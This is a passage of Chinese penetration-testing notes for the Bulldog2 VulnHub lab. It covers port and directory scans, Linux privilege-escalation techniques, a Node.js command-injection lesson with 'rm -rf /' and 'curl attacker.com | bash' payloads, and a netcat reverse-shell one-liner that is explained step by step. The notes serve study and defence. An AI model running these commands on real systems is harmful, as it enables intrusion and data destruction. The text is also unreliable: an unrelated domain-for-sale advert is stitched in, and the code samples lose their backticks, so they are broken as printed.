1. 密码存储方式
/etc/passwd 文件：这个文件中的密码字段通常不包含实际的密码，而是存储一个占位符（例如 x 或 *），表示密码被存储在 /etc/shadow 文件中。
/etc/shadow 文件：这是存储加密密码的地方。现代 Linux 系统通常使用较强的加密算法（如 SHA-512）来存储用户密码，而不是明文密码。

curl POST 传参

curl -X POST -d "file=/etc/passwd" http://192.168.153.130/test
如果是json
curl -X POST -H "Content-Type: application/json" -d '{"file": "/etc/passwd"}' http://192.168.153.130/test
#curl #POST #传参

python 依赖安装的国内加速
pip3 install -r requirement.txt -i https://mirrors.aliyun.com/pypi/simple/

#python #国内源 #加速

dirsearch -u http://192.168.153.130/ --exclude-status 403,401
这次使用 dirsearch 的目录扫描结果如下：

### 扫描概况：
- **目标**：`http://192.168.153.130/`
- **排除了 403 和 401 状态码**（即忽略没有权限访问的目录）。
- **扩展名**：扫描了 .php, .aspx, .jsp, .html, .js 文件。
- **线程数**：25
- **字典大小**：11460个条目

### 结果概述：
- **成功返回的目录**：
- `/add`（200 OK）
- `/add.php`（200 OK）
- `/c`（200 OK）
- `/head`（200 OK）
- `/head.php`（200 OK）
- `/images/`（200 OK，重定向到 `http://192.168.153.130/images/`）
- `/in`（200 OK）
- `/show`（200 OK）
- `/test`（200 OK）
- `/test.php`（200 OK）
- `/phpmy/`（200 OK）

- **重定向**：
- /images`（301 Moved Permanently，重定向到 /images/`）
- /panel 和 `/panel.php`（302 Found，重定向到 `index.php`）

### 总结：
- 目标主机上多个目录和文件存在，包括 PHP 文件（如 /add.php, /test.php`）和其他常见目录（如 /images/, /phpmy/`）。
- 一些目录如 /panel 和 /images 会进行重定向。
- 没有返回 403 或 401 错误，符合排除条件。

此扫描揭示了目标网站上开放的多个目录和文件路径，有助于进一步的安全分析。
#dirsearch #目录扫描 #安全测试 #结果分析

这个 gobuster 扫描结果显示了对目标主机 http://192.168.153.130/ 进行目录扫描的结果。以下是简要分析：

- **扫描概况**：
- 使用了字典 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 进行扫描。
- 扫描的 HTTP 方法是 `GET`，线程数为 10，超时设置为 10 秒。
- 排除了返回 `404` 状态码的目录（即未找到的目录）。

- **发现的目录**：
- /index (200 OK)：存在并返回了页面。
- /images (301 Moved Permanently)：存在并重定向到 `http://192.168.153.130/images/`。
- /c, /in, /add, /show, /test, /head, /head2 (200 OK)：这些目录存在，返回 200 状态码。
- /uploaded_images (301 Moved Permanently)：存在并重定向到 `http://192.168.153.130/uploaded_images/`。
- /panel (302 Found)：存在并重定向到 `index.php`。
- /server-status (403 Forbidden)：存在但访问被拒绝（权限不足）。

- **总结**：
- 目标网站包含多个有效的目录和页面，部分目录如 /images 和 /uploaded_images 可能包含上传的内容。
- /server-status 页面返回了 403 状态码，表示访问受限。
- 大多数发现的目录都返回了 200 或 301 状态码，意味着它们存在并且有效。

此扫描结果有助于进一步探索目标网站的潜在入口和敏感目录。
#gobuster #目录扫描 #网站枚举 #安全测试

这个 nmap 扫描结果表明目标主机 192.168.153.130 上的端口 22 和 80 是开放的，分别提供 SSH 和 HTTP 服务。以下是详细分析：

- **端口 22 (SSH)**：开放且正在运行 SSH 服务。
- **端口 80 (HTTP)**：开放且正在运行 HTTP 服务，扫描结果显示几个与安全相关的信息：
- **PHPSESSID Cookie**：未设置 httponly 标志，可能使会话信息更易受到 XSS 攻击。
- **内部 IP 泄露**：HTTP 服务泄露了内部 IP 地址 `127.0.1.1`，可能暴露内部网络结构。
- **潜在目录**：`/images/` 目录可能包含敏感或有趣的文件，并且目录列表已启用，可能带来信息泄露风险。
- **Web 应用漏洞**：没有发现 CSRF、存储型 XSS 或 DOM 型 XSS 漏洞。

- **MAC 地址**：目标主机使用 VMware 虚拟机环境。

总的来说，目标主机有一些潜在的安全隐患，如会话标志未正确设置、内部 IP 泄漏以及可能暴露的目录列表。
#nmap #漏洞扫描 #SSH #HTTP #安全漏洞

nmap 收集信息：

### 1. 快速全端口扫描

sudo nmap --min-rate 10000 -p- 192.168.153.130
   

- 功能**：扫描目标 IP 地址（192.168.153.130）上的所有端口（1-65535）。
- **选项**：
- `--min-rate 10000`：设置最小扫描速率，每秒发送最少 10000 个数据包，加快扫描速度。
- `-p-`：扫描所有端口。
- **用途**：适用于需要快速发现目标主机上开放端口的场景。

### 2. **TCP 全连接扫描 + 服务版本识别 + 操作系统识别 + 默认脚本扫描

sudo nmap -sT -sV -sC -O -p 22,80 192.168.153.130
   

- 功能**：对目标 IP 地址执行 TCP 连接扫描（全连接），并同时执行服务版本识别、操作系统识别和默认的漏洞扫描脚本。
- **选项**：
- `-sT`：TCP 连接扫描（通过完整的三次握手连接目标主机端口）。
- `-sV`：服务版本识别，查找目标主机上运行的服务版本。
- `-sC`：执行 nmap 默认脚本（例如检测已知漏洞、配置问题等）。
- `-O`：操作系统识别。
- `-p 22,80`：仅扫描端口 22 和 80。
- **用途**：适用于详细的信息收集和漏洞识别，尤其是对常见的服务（如 SSH、HTTP）进行深度分析。

### 3. **UDP 扫描

sudo nmap -sU -p 22,80 192.168.153.130
   

- 功能**：对目标 IP 地址执行 UDP 扫描，扫描端口 22 和 80。
- **选项**：
- `-sU`：执行 UDP 扫描（与 TCP 扫描不同，UDP 扫描不会建立连接，通常较慢）。
- `-p 22,80`：扫描端口 22 和 80（通常这两个端口是 TCP 服务，但此命令是通过 UDP 扫描的）。
- **用途**：用于检测目标主机上的 UDP 服务，特别是在 UDP 协议上常用的服务。

### 4. **漏洞扫描

sudo nmap --script=vuln -p 22,80 192.168.153.130
   

- **功能**：对目标 IP 地址执行漏洞扫描，检查端口 22 和 80 是否存在已知的漏洞。
- **选项**：
- `--script=vuln`：启用 nmap 的漏洞扫描脚本（检查已知漏洞）。
- `-p 22,80`：扫描端口 22 和 80。
- **用途**：用于检测目标主机是否存在已知的安全漏洞，尤其适用于评估目标主机的安全性。

### 总结：
- **快速扫描**（第一个命令）适用于快速检测目标主机上开放的端口。
- **详细扫描**（第二个命令）用于获得目标的服务版本、操作系统信息和潜在漏洞。
- **UDP 扫描**（第三个命令）专门用于检测 UDP 协议上的服务，适用于识别不常见的 UDP 服务。
- **漏洞扫描**（第四个命令）通过漏洞脚本检查目标的已知漏洞，帮助识别潜在的安全风险。

这些命令可以帮助网络安全人员全面了解目标主机的开放端口、服务版本、操作系统信息，以及可能存在的安全漏洞。
#nmap #网络扫描 #漏洞扫描 #服务识别 #端口扫描

kali 启用ssh 密码登录

sudo sed -i '1s/^/PasswordAuthentication yes\n/' /etc/ssh/sshd_config && sudo service ssh start && sudo service ssh status
#kali #SSH #命令组合 #服务启动

使用 nmap 执行不同扫描：

1. 第一个命令：
sudo nmap --min-rate 10000 -p- 192.168.153.130
这个命令对目标 IP 地址（192.168.153.130）执行端口扫描，使用 --min-rate 10000 设置扫描速度，意味着每秒最小发送 10,000 个数据包，`-p-` 表示扫描所有端口（1-65535）。

2. 第二个命令：
sudo nmap -sT -sV -sC -O -p 22,80 192.168.153.130
这个命令执行多种扫描：
- `-sT`：使用 TCP 连接扫描（全连接扫描）。
- `-sV`：尝试识别服务版本。
- `-sC`：使用默认的脚本扫描（可以帮助发现更多信息）。
- `-O`：启用操作系统识别。
- `-p 22,80`：仅扫描端口 22 和 80。

3. 第三个命令：
sudo nmap -sU -p 22,80 192.168.153.130
这个命令执行 UDP 扫描（使用 `-sU`），对目标 IP 地址的 22 和 80 端口进行扫描。UDP 扫描通常比 TCP 扫描慢，因为 UDP 是无连接协议，且不返回 ACK 包。

这些命令适用于快速和全面的网络扫描，帮助识别目标系统上开放的端口、服务版本以及其他潜在的安全信息。
#nmap #网络扫描 #TCP扫描 #UDP扫描

在 Linux 系统中，低权限用户（例如普通用户）可能尝试通过多种方式来提升权限，从而获得更高的访问控制。通常，提权的目标是获得 root 权限，允许用户执行系统管理任务，如安装软件、修改系统文件等。以下是一些常见的低权限用户提权的方法和技术：

1. 利用 sudo 权限

如果低权限用户有某些命令的 sudo 权限，可以使用 sudo 提升权限。常见的情况是用户只能执行某些特定命令，但通过一些技巧可以执行更广泛的操作。

方法：

检查 sudo 权限：

sudo -l

这会列出当前用户可以以 sudo 权限执行的命令。如果你发现可以执行某个程序（如 bash 或 sh），那么可以通过它们来启动一个具有 root 权限的 shell。

如果 sudo 允许执行任意命令（例如，sudo /bin/bash），则可以直接执行：

sudo /bin/bash

如果 sudo 仅允许执行某些特定命令，可以检查是否有其他可用漏洞（例如，执行某些脚本时，脚本可以启动一个 shell）。


2. 利用 SUID（Set User ID）文件

SUID 是 Linux 中的一种特殊文件权限，它允许用户以文件所有者的身份执行程序（通常是 root）。当某个程序设置了 SUID 权限时，执行该程序的用户会获得文件所有者（通常是 root）权限。

方法：

使用 find 查找系统中的所有 SUID 程序：

find / -type f -perm -4000 2>/dev/null

如果你发现某个可执行文件（例如 /bin/ping、/usr/bin/passwd）有 SUID 权限并且是 root 所有，那么你可以尝试通过该程序提权。例如，如果发现 ping 是 SUID 程序，并且该程序允许普通用户执行，你可以尝试它：

/bin/ping -c 1 127.0.0.1

尝试通过该程序调用其他命令，获取更高权限。


3. 利用 Cron Jobs 或 Schedulers

Linux 系统通常会有一些后台任务，使用 cron 或 at 来定期执行任务。如果低权限用户能够修改这些任务，就可以通过它们来提权。

方法：

检查是否有任何 cron 作业运行：

crontab -l

如果能修改某个 cron 作业，尝试将它修改为执行一个恶意命令（如 /bin/bash）或执行其他有害操作。可以尝试将 cron 作业替换为以下内容：

* * * * * /bin/bash

如果系统允许你设置特定脚本的 cron 作业，并且你可以控制脚本内容，那么可以利用该脚本执行其他恶意命令。


4. 利用文件权限漏洞

有时，某些系统文件或目录可能没有正确的权限配置，允许低权限用户修改重要的配置文件或脚本，进而提权。

方法：

检查具有写权限的关键系统文件：

find / -type f -name "passwd" -writable 2>/dev/null

如果你能够修改如 /etc/passwd 等文件，可以尝试直接修改该文件来增加用户账户或修改现有账户的权限。例如，修改 /etc/passwd 将用户 ID (UID) 设置为 0（root 权限）。

检查目录权限是否过于宽松，是否可以通过覆盖重要文件来获取 root 权限。


5. 利用内核漏洞

内核漏洞可以让用户在没有任何权限的情况下提升权限。虽然这些漏洞往往比较复杂且依赖于特定的内核版本，但它们可以绕过大多数安全控制。

方法：

查找并利用本地提权漏洞。例如，针对特定内核版本的漏洞（例如 Dirty COW 漏洞）可以利用未打补丁的内核漏洞执行恶意代码，从而获得 root 权限。

使用工具如 searchsploit 或访问漏洞数据库（如 Exploit-DB）来查找针对你所用内核版本的已知漏洞。


6. 利用 suid 程序绕过

如果系统允许某些程序以 root 权限运行，攻击者可能会通过编写恶意脚本或程序来绕过现有的权限控制。

方法：

如果 find 命令显示某些 SUID 程序可执行，你可以尝试通过它们启动一个 root 权限的 shell。例如，有些程序可能没有受到严格的限制，允许启动一个 shell。


7. 利用共享库漏洞

通过滥用共享库，用户可以劫持正在执行的程序的行为，提升权限。

方法：

检查是否可以修改环境变量（例如 LD_PRELOAD），使得程序加载恶意的共享库，执行具有更高权限的命令：

export LD_PRELOAD=/path/to/malicious/library.so

如果能够修改执行环境，可以通过这种方式劫持系统进程或用户执行的命令。


8. 利用弱配置或错误的安全设置

有时，管理员的安全设置过于宽松或者配置不当，这为低权限用户提供了提权的机会。

方法：

检查是否存在不安全的文件或目录权限设置，例如 /etc/sudoers 文件的错误配置，或者程序配置中没有限制的命令。

检查是否能够访问和修改用户配置文件，尤其是系统级配置文件，如 /etc/sudoers 或 /etc/hosts.allow，这些配置文件的错误设置有时会允许用户提升权限。


9. 利用缓冲区溢出漏洞

一些程序可能存在缓冲区溢出漏洞，允许低权限用户将恶意代码注入到系统内存中，进而获得更高权限。

方法：

如果系统运行的程序有缓冲区溢出漏洞，攻击者可以通过精心构造输入，覆盖返回地址并跳转到恶意代码。攻击者可以利用这些漏洞绕过权限限制。


10. 社交工程

如果直接的提权手段失败，攻击者可以使用社交工程学方法来获得管理员的权限。例如，诱使管理员运行恶意脚本、点击链接或提供敏感信息等。


---

总结：

提权的成功依赖于具体系统的配置和漏洞，低权限用户可以通过多种方式尝试提升自己的权限。在实践中，通常需要结合多种技术来实现提权，常见的方式包括利用 SUID 程序、修改 cron 作业、滥用文件权限漏洞、内核漏洞等。防范低权限提权攻击的措施包括及时更新系统和应用程序、限制 sudo 权限、正确设置文件权限和密切监控系统活动。

在 Linux 系统中，文件和目录的权限控制是基于访问控制列表（ACL）的基础上进行管理的，每个文件和目录都有一组权限设置，决定了不同用户如何访问和操作文件。文件权限通过 10 个字符表示，其中包含文件类型以及不同用户（所有者、组、其他用户）的权限。

文件权限表示格式

Linux 文件权限通常通过 ls -l 命令显示，结果类似以下格式：

-rwxr-xr-x 1 user group 4096 Nov 6 14:30 examplefile

这行输出表示文件 examplefile 的权限和其他信息。它的详细解释如下：

-rwxr-xr-x 1 user group 4096 Nov 6 14:30 examplefile

第1个字符（文件类型）：

-：普通文件

d：目录

l：符号链接

c：字符设备文件

b：块设备文件

s：套接字文件

p：命名管道文件（FIFO）


第2至10个字符（权限信息）：这部分被分成三组，每组三个字符，分别代表文件的 所有者、所属组 和 其他用户 的权限。


权限字符含义：

每个权限由三个字符组成：

r（read）：读取权限，允许查看文件内容或列出目录中的文件。

w（write）：写入权限，允许修改文件内容或在目录中创建、删除文件。

x（execute）：执行权限，允许执行文件（如果是可执行文件），或进入该目录。


如果某个权限没有被授予，则用 - 替代：

rwx：完全权限（可读、可写、可执行）

r-x：只读和可执行

rw-：可读和可写

r--：只读

---：无任何权限


示例：

假设你看到以下输出：

-rwxr-xr-x 1 user group 4096 Nov 6 14:30 examplefile

所有者权限（rwx）：

r（read）：文件所有者可以读取文件。

w（write）：文件所有者可以修改文件。

x（execute）：文件所有者可以执行该文件。


组权限（r-x）：

r（read）：所属组的用户可以读取文件。

-（没有写权限）：所属组的用户不能修改文件。

x（execute）：所属组的用户可以执行文件。


其他用户权限（r-x）：

r（read）：其他所有用户可以读取文件。

-（没有写权限）：其他用户不能修改文件。

x（execute）：其他用户可以执行文件。



数字权限表示法（八进制表示法）

Linux 还支持使用数字来表示权限。每个权限可以被映射为一个数字：

r = 4

w = 2

x = 1

- = 0


每组三个字符的权限可以通过将它们的数值相加来表示。例如：

rwx = 4 + 2 + 1 = 7

rw- = 4 + 2 + 0 = 6

r-x = 4 + 0 + 1 = 5

r-- = 4 + 0 + 0 = 4


因此，rwxr-xr-x 会被表示为 755，而 rw-r--r-- 会被表示为 644。

示例数字表示：

chmod 755 examplefile

这个命令给文件 examplefile 设置权限 rwxr-xr-x（即所有者有读、写、执行权限，组和其他用户只有读和执行权限）。

用户类别：

文件权限是基于三个不同的用户类别来设置的：

1. 所有者（Owner）：文件的所有者。一般是文件的创建者，或者在文件所有权转移时指定的用户。


2. 组（Group）：与文件关联的用户组。文件的所属组的成员有一组特定的权限。


3. 其他用户（Others）：除所有者和组之外的所有用户。



常用的权限操作命令：

1. 查看文件权限：

ls -l filename


2. 修改文件权限： 使用 chmod 命令来更改文件或目录的权限。

使用数字表示法：

chmod 755 filename # 所有者可读写执行，组和其他用户可读和执行

使用符号表示法：

chmod u+x filename # 给文件所有者添加执行权限
chmod go-w filename # 从组和其他用户移除写权限



3. 修改文件所有者和组： 使用 chown 命令来修改文件的所有者和用户组。

chown user:group filename # 将文件的所有者更改为 user，所属组更改为 group


4. 设置特殊权限：

Setuid（s）：使程序以文件所有者的权限执行。

Setgid（s）：使程序以文件所属组的权限执行，或者在目录中设置，创建的新文件将继承该目录的组。

Sticky bit（t）：仅允许文件所有者删除文件，通常用于目录（如 /tmp）。




权限的特殊设置：

Setuid（Set User ID）： 当一个可执行文件设置了 setuid 权限时，执行该文件的用户将暂时获得文件所有者的权限。例如，/bin/passwd 设置了 setuid，普通用户可以修改自己的密码，但文件是由 root 所有，执行时以 root 权限运行。

Setgid（Set Group ID）：

对于文件，设置 setgid 权限会使该文件以文件所属组的身份执行。

对于目录，设置 setgid 会使该目录中新创建的文件和目录继承该目录的组，而不是创建者的组。


Sticky Bit： 通常用于目录，如 /tmp 目录。设置了 Sticky Bit 的目录，文件只能由文件所有者、目录所有者或 root 删除。这防止了其他用户删除或修改他们不拥有的文件。


总结：

Linux 文件权限系统为用户提供了灵活的访问控制机制，通过设置不同的权限组合，用户可以精确控制文件和目录的访问权限。了解和合理配置文件权限对于系统安全至关重要。

/proc 是 Linux 系统中的一个虚拟文件系统，它提供了许多关于内核、进程、系统资源和硬件信息的接口。/proc 不包含实际的文件数据，而是内核动态生成的文件，允许用户访问和修改系统状态。可以通过读取这些文件来获得系统的实时信息，也可以通过写入一些文件来调整内核参数或配置。

/proc 目录的常见功能和用途：

1. 进程信息：

/proc/[pid]/：每个运行中的进程都有一个对应的目录，其中 [pid] 是进程ID。该目录包含与该进程相关的各种信息文件。

/proc/[pid]/status：显示进程的详细信息（如状态、内存使用、资源限制等）。

/proc/[pid]/cmdline：显示进程启动时的命令行参数。

/proc/[pid]/fd/：该目录包含进程打开的文件的符号链接（文件描述符）。

/proc/[pid]/stat：显示进程的统计信息，如CPU时间、内存使用、状态等。




2. 系统信息：

/proc/cpuinfo：显示CPU的详细信息（如型号、频率、缓存等）。

/proc/meminfo：显示系统的内存使用情况，包括总内存、可用内存、缓存、交换空间等。

/proc/uptime：显示系统启动以来的运行时间（以秒为单位）和空闲时间。

/proc/version：显示内核版本和编译信息。

/proc/partitions：显示系统的磁盘分区信息。



3. 内核信息：

/proc/sys/：该目录包含各种内核参数，允许通过读取或修改这些文件来配置内核行为。例如：

/proc/sys/vm/swappiness：控制交换空间的使用倾向。

/proc/sys/net/ipv4/ip_forward：控制IPv4的IP转发。

/proc/sys/kernel/osrelease：显示内核的发行版本。


/proc/modules：显示加载的内核模块及其状态。

/proc/interrupts：显示中断请求（IRQ）的统计信息。

/proc/loadavg：显示系统负载信息，包括1分钟、5分钟、15分钟的平均负载。



4. 文件系统信息：

/proc/mounts：显示当前挂载的文件系统及其挂载点信息。

/proc/filesystems：列出内核支持的文件系统类型。



5. 网络信息：

/proc/net/：该目录下的文件提供网络相关的信息。

/proc/net/tcp：显示当前TCP连接的状态。

/proc/net/udp：显示当前UDP连接的状态。

/proc/net/dev：显示网络接口的统计信息。




6. 硬件信息：

/proc/iomem：显示系统内存区域的分配情况，通常用于检查物理内存和内存映射区域。

/proc/ioports：显示系统硬件I/O端口的映射。

/proc/driver/：显示内核驱动的状态和配置。



7. 调试和诊断：

/proc/self/：这个目录表示当前进程的状态，访问它相当于访问 /proc/[pid]/，其中 [pid] 是当前进程的ID。可以用来获取当前进程的详细信息。

/proc/sysrq-trigger：允许触发内核的紧急操作，如重启、杀死进程等，通常用于系统崩溃后进行诊断。

/proc/kcore：是一个虚拟文件，代表整个物理内存的转储，通常用于内核调试和内存分析。



8. 虚拟文件：

/proc/self/maps：显示当前进程的内存映射，包括已加载的库、堆栈等。

/proc/self/status：显示当前进程的状态信息（如内存使用、调度信息、进程ID等）。

/proc/self/fd/：包含当前进程打开的文件描述符列表。




示例命令和输出：

1. 查看 CPU 信息：

cat /proc/cpuinfo


2. 查看内存使用情况：

cat /proc/meminfo


3. 查看系统运行时间：

cat /proc/uptime


4. 查看系统负载：

cat /proc/loadavg



修改 /proc 文件：

某些 /proc 目录中的文件可以直接写入来修改内核或系统的行为。例如：

修改内核参数：

echo 1 > /proc/sys/net/ipv4/ip_forward # 开启 IP 转发

修改虚拟内存管理：

echo 60 > /proc/sys/vm/swappiness # 设置交换空间使用的倾向


总结

/proc 是一个非常强大的虚拟文件系统，它为Linux用户和系统管理员提供了系统、硬件、进程、网络等各方面的实时信息。它不仅可以用于系统监控、调试和性能分析，还可以通过写入一些特定的文件来修改内核或系统配置。

在Node.js中，使用exec()函数时，如果没有妥善处理输入，确实可能引发远程代码执行（RCE, Remote Code Execution）漏洞。这种漏洞通常发生在攻击者能够操控exec()执行的命令时，尤其是当命令包含来自不可信来源的输入时。

如何导致RCE漏洞

exec()函数会执行由字符串形式传递的命令，因此，如果没有对输入进行适当的验证和过滤，攻击者可以通过注入恶意命令来执行任意代码。例如，如果你直接将用户的输入传递给exec()，并且没有任何防范措施，攻击者可能会注入额外的命令来执行恶意操作。

例子：易受攻击的代码

假设有一个Node.js应用，用户输入一个文件名，应用会执行一个ls命令来列出文件：

const { exec } = require('child_process');

// 假设用户输入的文件路径
let userInput = 'somefile';

// 执行系统命令
exec(ls ${userInput}, (error, stdout, stderr) => {
if (error) {
console.error(exec error: ${error});
return;
}
console.log(stdout: ${stdout});
});

攻击者可以通过传入特殊字符来注入恶意命令，例如：

somefile; rm -rf / # 或者 somefile && curl http://attacker.com/malicious-script.sh | bash

如果用户输入了恶意命令，exec()就会执行这个命令，从而导致代码执行（RCE）。

防范RCE漏洞

为了防止这种情况，通常需要采取以下措施：

1. 验证和清理用户输入： 对所有传入的用户数据进行严格的验证，确保它们符合预期格式。例如，确保文件路径或命令参数只包含字母、数字、下划线等安全字符。

例子：只允许字母、数字和-，_等符号

let userInput = 'somefile';

// 使用正则表达式验证输入是否合法
if (!/^[a-zA-Z0-9_-]+$/.test(userInput)) {
console.error('Invalid input');
return;
}

exec(ls ${userInput}, (error, stdout, stderr) => {
if (error) {
console.error(exec error: ${error});
return;
}
console.log(stdout: ${stdout});
});


2. 避免直接将用户输入传递给exec()： 尽量不要将未经处理的用户输入直接作为命令的一部分。考虑使用更安全的替代方法，例如直接使用程序的参数传递，而不是将其拼接到命令字符串中。

例如，改为使用spawn()或spawnSync()来执行外部命令，这些方法使用参数数组来传递输入，而不是直接拼接字符串，从而降低了命令注入的风险：

const { spawn } = require('child_process');

// 使用参数数组，而不是拼接命令字符串
const ls = spawn('ls', [userInput]);

ls.stdout.on('data', (data) => {
console.log(stdout: ${data});
});

ls.stderr.on('data', (data) => {
console.error(stderr: ${data});
});

ls.on('close', (code) => {
console.log(child process exited with code ${code});
});


3. 限制执行命令的范围： 尽量限制可以执行的命令范围。通过控制可以执行的命令列表，避免用户输入执行任意系统命令的权限。


4. 使用环境隔离： 如果必须执行外部命令，可以考虑将应用程序运行在受限的环境中（如Docker容器、虚拟机等），并尽量限制子进程的权限，避免其有执行恶意命令的能力。


5. 审计和监控： 定期审查和监控代码中的exec()调用，确保其没有被恶意代码利用。



总结

Node.js中的exec()函数非常强大，但也容易受到远程代码执行（RCE）攻击，尤其是在没有充分验证用户输入的情况下。为了防止RCE漏洞，开发者应该采取严格的输入验证措施，并避免直接将用户输入拼接到命令字符串中。此外，使用spawn()或spawnSync()等更安全的替代方法也是一种有效的防护措施。

Attacker

Attacker - The Domain Name Attacker.com is Now For Sale.

Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.

在Node.js中，exec()是child_process模块提供的一个函数，允许你执行外部命令或系统命令，并返回执行结果。exec()用于执行一个字符串命令，并通过回调函数返回命令的标准输出和标准错误信息。

语法

const { exec } = require('child_process');

exec(command, options, callback);

command：要执行的命令字符串。

options：可选的配置对象，用于设置子进程的行为（例如当前工作目录、环境变量等）。

callback：执行完成后的回调函数，格式为 (error, stdout, stderr)，分别表示：

error：如果执行失败，返回错误信息。

stdout：命令执行的标准输出。

stderr：命令执行的标准错误输出。



示例：执行ls命令

const { exec } = require('child_process');

exec('ls', (error, stdout, stderr) => {
if (error) {
console.error(exec error: ${error});
return;
}
if (stderr) {
console.error(stderr: ${stderr});
return;
}
console.log(stdout: ${stdout});
});

stdout：会包含命令执行的正常输出。

stderr：会包含命令执行的错误输出。

如果命令执行出错，error会包含错误信息。


示例：执行带有参数的命令

const { exec } = require('child_process');

exec('ls -l /some/directory', (error, stdout, stderr) => {
if (error) {
console.error(exec error: ${error});
return;
}
console.log(stdout: ${stdout});
});

示例：执行带有回调函数的命令并处理输出

const { exec } = require('child_process');

exec('echo "Hello, World!"', (error, stdout, stderr) => {
if (error) {
console.error(exec error: ${error});
return;
}
console.log(Command output: ${stdout}); // 输出: Hello, World!
});

注意事项：

1. 输出大小限制：exec()返回的stdout和stderr默认有大小限制（通常是1MB），如果命令输出过大，可能会截断。若需要处理大输出，建议使用spawn()而不是exec()。


2. 安全性问题：直接将用户输入传递给exec()可能会导致命令注入攻击。为了避免这一点，务必对输入进行有效的验证和清理。


3. 异步执行：exec()是异步的，回调函数会在命令执行完成后被调用。



示例：处理大输出

如果你需要执行一个可能产生大量输出的命令，可以考虑使用spawn()，它比exec()更适合处理大数据流，因为它允许逐步处理输出，而不是一次性加载所有输出到内存中。

const { spawn } = require('child_process');

const ls = spawn('ls', ['-l', '/some/directory']);

ls.stdout.on('data', (data) => {
console.log(stdout: ${data});
});

ls.stderr.on('data', (data) => {
console.error(stderr: ${data});
});

ls.on('close', (code) => {
console.log(child process exited with code ${code});
});

总结

exec()用于执行外部命令，并通过回调函数返回结果。

它是异步的，可以处理命令输出，但对于大规模数据输出可能有限制，推荐使用spawn()。

使用时要注意防范命令注入和输出截断问题。

https://download.vulnhub.com/bulldog/Bulldog2.ova

Bulldog2 靶场

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.103 4444 >/tmp/f;

这条命令链的作用是创建一个反向 Shell，通过 nc（Netcat）连接到远程主机（192.168.56.103）的端口 4444，将本地的 /bin/sh shell 通过管道传输到远程主机，实现在目标机器上执行命令的功能。我们可以逐步解析：

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.103 4444 > /tmp/f;

逐步解释

1. rm /tmp/f

这条命令删除 /tmp/f 文件。如果 /tmp/f 已经存在，它将被删除，为接下来的命令准备干净的环境。



2. mkfifo /tmp/f

这条命令创建一个名为 /tmp/f 的 FIFO 文件（即命名管道）。FIFO 是一种特殊的文件类型，它允许两个进程通过文件进行通信。在这里，/tmp/f 被用作 shell 和 Netcat 之间的通信通道。



3. cat /tmp/f | /bin/sh -i 2>&1

cat /tmp/f：读取管道文件 /tmp/f 中的数据。

|（管道符号）将 cat /tmp/f 的输出传递给 /bin/sh -i，即交互式 Shell。

/bin/sh -i 启动一个交互式的 shell，意味着它会读取用户输入并执行命令。

2>&1：将标准错误输出（stderr）重定向到标准输出（stdout），确保所有的错误信息也会通过管道传输。



4. | nc 192.168.56.103 4444

nc（Netcat）是一个常用于网络通信的工具。此处，nc 将 shell 的输出传输到指定的 IP 地址 192.168.56.103 和端口 4444。这意味着目标机器将通过 Netcat 与攻击者的机器建立连接，反向连接到攻击者的机器。



5. > /tmp/f

将 nc 命令的输出重定向到 /tmp/f，即把远程主机的输入（来自 192.168.56.103:4444）通过管道传输到 /tmp/f，并最终传递给 cat 和 /bin/sh，从而完成双向通信。




整体工作原理

1. rm /tmp/f 删除 /tmp/f，如果已经存在的话。


2. mkfifo /tmp/f 创建一个命名管道 /tmp/f，用于进程间通信。


3. cat /tmp/f 读取管道 /tmp/f 中的数据，并将其通过管道传递给 /bin/sh -i。


4. /bin/sh -i 启动一个交互式 shell，将输入传递给 shell 执行，错误和标准输出都会通过管道传输。


5. nc 192.168.56.103 4444：将 shell 的输出传送到远程主机的 IP 192.168.56.103，端口 4444。


6. > /tmp/f：通过管道将来自远程主机的输入（即攻击者通过 nc 向目标发送的命令）写入到 /tmp/f，让它被 cat 读取并传递给 /bin/sh，实现反向 shell 交互。



总结

这个命令链通常用于建立一个反向 shell，它通过 nc 连接到攻击者的主机，在目标系统上启动一个交互式 shell。攻击者可以通过远程连接向目标系统发送命令，并接收命令的输出。